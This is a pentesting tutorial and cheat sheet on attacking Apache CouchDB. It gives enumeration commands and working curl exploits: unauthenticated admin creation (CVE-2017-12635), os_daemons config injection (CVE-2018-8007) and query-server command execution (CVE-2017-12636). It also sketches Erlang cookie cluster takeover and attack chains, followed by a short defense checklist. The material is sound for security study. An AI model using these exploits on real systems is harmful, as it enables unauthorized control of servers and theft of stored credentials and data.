# CouchDB - Port 5984,6984

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

### Basic info

CouchDB is **A document-oriented, schema-less NoSQL database where every “document” is just JSON.**

Internally, CouchDB stores:

| Field  | Meaning                          |
| ------ | -------------------------------- |
| `_id`  | The document’s unique identifier |
| `_rev` | Revision number (tracks changes) |

Documents can contain key-value mappings, nested maps, or lists.\
Everything is accessed through **HTTP REST APIs** — not drivers.

#### Default Ports

| Port     | Protocol | Purpose                                                        |
| -------- | -------- | -------------------------------------------------------------- |
| **5984** | HTTP     | Public API                                                     |
| **6984** | HTTPS    | Public API                                                     |
| **5986** | Internal | Node-local API                                                 |
| **4369** | TCP      | Erlang Port Mapper Daemon (EPMD) — extremely important for RCE |

And if you see **port 4369 (EPMD)** → your hacker senses should start tingling. (More on that later.)

***

## **Automatic Enumeration**

#### Nmap

```bash
nmap -sV --script couchdb-databases,couchdb-stats -p 5984 <IP>
```

#### Metasploit

```bash
msf> use auxiliary/scanner/couchdb/couchdb_enum
```

***

## **Manual Enumeration (Must-Know for Real Pentesters)**

#### Check if CouchDB is reachable

```bash
curl http://<IP>:5984/
```

Possible outputs:

**Unauthenticated access allowed:**

```json
{"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
```

**Authentication required:**

```json
{"error":"unauthorized","reason":"Authentication required."}
```

If you see **401**, you’ll need creds or an exploit.

***

## **High-Value Endpoints Hackers Should Always Check**

These endpoints typically reveal **database names**, **cluster metadata**, and **replication details** — sometimes containing **API keys**, **JWT secrets**, **production credentials**, or **remote cluster URLs**.

| Endpoint               | What It Reveals                              |
| ---------------------- | -------------------------------------------- |
| `/_active_tasks`       | Replication, indexing jobs, DB names         |
| `/_all_dbs`            | **All database names** (usually the jackpot) |
| `/_cluster_setup`      | Cluster configuration                        |
| `/_db_updates`         | Real-time database creation events           |
| `/_membership`         | Cluster nodes                                |
| `/_scheduler/jobs`     | Replication dag + credentials                |
| `/_node/_local/_stats` | System info                                  |
| `/_up`                 | Basic health check                           |
| `/_uuids`              | UUID generation                              |
| `/_reshard`            | Shard operations                             |

Use:

```bash
curl http://<IP>:5984/_all_dbs
```

If 401:

```bash
curl http://user:pass@<IP>:5984/_all_dbs
```

***

## **Extracting Databases, Documents & Credentials**

#### List databases

```bash
curl http://<IP>:5984/_all_dbs
```

Example:

```json
["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
```

#### Show DB metadata

```bash
curl http://<IP>:5984/<dbname>
```

#### List documents

```bash
curl http://<IP>:5984/<dbname>/_all_docs
```

#### Read a document

```bash
curl http://<IP>:5984/<dbname>/<doc_id>
```

At this point, in real pentests, you often find:

✔ API keys\
✔ Auth tokens\
✔ Password databases\
✔ Backups\
✔ Internal cluster secrets\
✔ User PII

***

## **Exploitation Techniques**

CouchDB has had **multiple high-impact CVEs**, many still found in the wild.

#### **CVE-2017-12635 — Create an Admin User Without Authentication**

This is the **most famous and most dangerous CouchDB vulnerability ever discovered**.

#### 🧠 Why it works

CouchDB parses JSON twice — once in **Erlang**, once in **JavaScript**.

If you send **two fields with the same key**, the Erlang parser keeps both, but the JS parser keeps only the last.

Meaning this payload:

```json
{
  "type":"user",
  "name":"hacktricks",
  "roles":["_admin"],
  "roles":[],
  "password":"hacktricks"
}
```

→ **Erlang sees roles=\["\_admin"]**\
→ **JS sees roles=\[]**

CouchDB incorrectly grants admin privileges.

#### Exploit:

```bash
curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' \
     http://<IP>:5984/_users/org.couchdb.user:hacktricks \
     -H "Content-Type:application/json"
```

You now have **admin control of the entire server**.

***

#### **CVE-2018-8007 — RCE via local.ini write injection (OS Daemons)**

If an attacker can write to `local.ini` (misconfigured perms), they can register system daemons to be executed by CouchDB.

Injection example:

```bash
curl -X PUT 'http://admin:admin@localhost:5984/_node/couchdb@localhost/_config/cors/origins' \
     -d "evil\n\n[os_daemons]\npwn=/usr/bin/touch /tmp/pwned"
```

Then:

```
kill couchdb PID
```

CouchDB restarts → executes `/usr/bin/touch /tmp/pwned`.

This is **full OS command execution**.

#### **CVE-2017-12636 — RCE via malicious query server definitions**

CouchDB allows admins to define query servers, e.g.:

```ini
[query_servers]
python=/usr/bin/python3
```

But if you can write:

```ini
cmd=/bin/sh
```

You can trigger it by creating a view that calls the query server.

Example exploitation flow:

```bash
curl -X PUT http://admin:pass@host:5984/evil
curl -X PUT http://admin:pass@host:5984/evil/payload -d '{"_id":"x"}'
curl -X PUT http://admin:pass@host:5984/evil/_design/pwn \
     -d '{"views":{"x":{"map":""}},"language":"cmd"}'
```

Boom → command execution.

#### **Erlang Cookie RCE (Not a CVE — but extremely real)**

If port **4369 (EPMD)** is open AND you can read the Erlang cookie file (usually `.erlang.cookie`), you can:

✔ Join the CouchDB cluster\
✔ Execute arbitrary Erlang code\
✔ Spawn remote shells\
✔ Dump secrets\
✔ Control the entire node

This is a **full cluster compromise**.

Erlang cookies are commonly found in:

```
/home/couchdb/.erlang.cookie
/home/<user>/.erlang.cookie
```

If readable → game over.

***

## **Practical Real-World Attack Chains**

### Attack Chain 1:

#### **Unauthenticated CouchDB + Exposed \_all\_dbs → Secrets → Lateral Movement**

1. Access `/_all_dbs`
2. Dump `_replicator` DB
3. Replication tasks often include remote credentials
4. Use creds to pivot into AWS, GitLab, MongoDB, etc.

***

### Attack Chain 2:

#### **CVE-2017-12635 Admin Creation → Query Server RCE → Reverse Shell**

1. Create admin user (CVE-2017-12635)
2. Add malicious query server
3. Trigger RCE via design document
4. Send reverse shell payload
5. Full system compromise

***

### Attack Chain 3:

#### **Misconfigured local.ini → CouchDB Daemon Injection (CVE-2018-8007) → Privilege escalation**

1. Write to `/home/*/etc/local.ini`
2. Inject `[os_daemons]`
3. Restart CouchDB → execute payload
4. Gain local user’s privileges
5. Escalate via sudo misconfig or cron jobs

***

### Attack Chain 4:

#### **Erlang Cookie Leakage → Cluster Takeover**

1. Access `.erlang.cookie` (world-readable)
2. Connect to EPMD node
3. Execute arbitrary Erlang commands
4. RCE without touching CouchDB API
5. Persist via erlang shell

This is extremely powerful and still commonly found.

***

## **Defending CouchDB (What Blue Teams Must Fix)**

✔ Disable remote access to 5984 unless behind firewall\
✔ Block port 4369 (EPMD) externally\
✔ Do NOT allow world-writable `local.ini`\
✔ Upgrade from vulnerable versions:

* 1.x
* 2.x pre-2.2\
  ✔ Enforce authentication (`require_valid_user = true`)\
  ✔ Disable `_session` cookie if not needed\
  ✔ Disable CORS unless required\
  ✔ Rotate Erlang cookie after compromise\
  ✔ Disable default admin/admin accounts

***

## **Cheat Sheet Summary for Pentesters**

#### Enumeration

```
curl http://host:5984/
curl http://host:5984/_all_dbs
curl http://host:5984/<db>/_all_docs
curl http://host:5984/<db>/<id>
```

#### CVE-2017-12635 Admin Creation

```
curl -X PUT -d '{"type":"user","name":"pwn","roles":["_admin"],"roles":[],"password":"pwn"}'
```

#### CVE-2017-12636 / Query Server RCE

```
curl -X PUT /_config/query_servers/cmd -d '"/bin/sh"'
```

#### CVE-2018-8007 OS Daemon Injection

```
[os_daemons]
evil=/bin/sh /tmp/malicious.sh
```

#### Erlang Cookie RCE

Look for `.erlang.cookie` + port 4369 open.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://whop.com/verylazytech/)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://whop.com/verylazytech/)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://whop.com/verylazytech/)for e-books and courses.  📚

</details>
{% endhint %}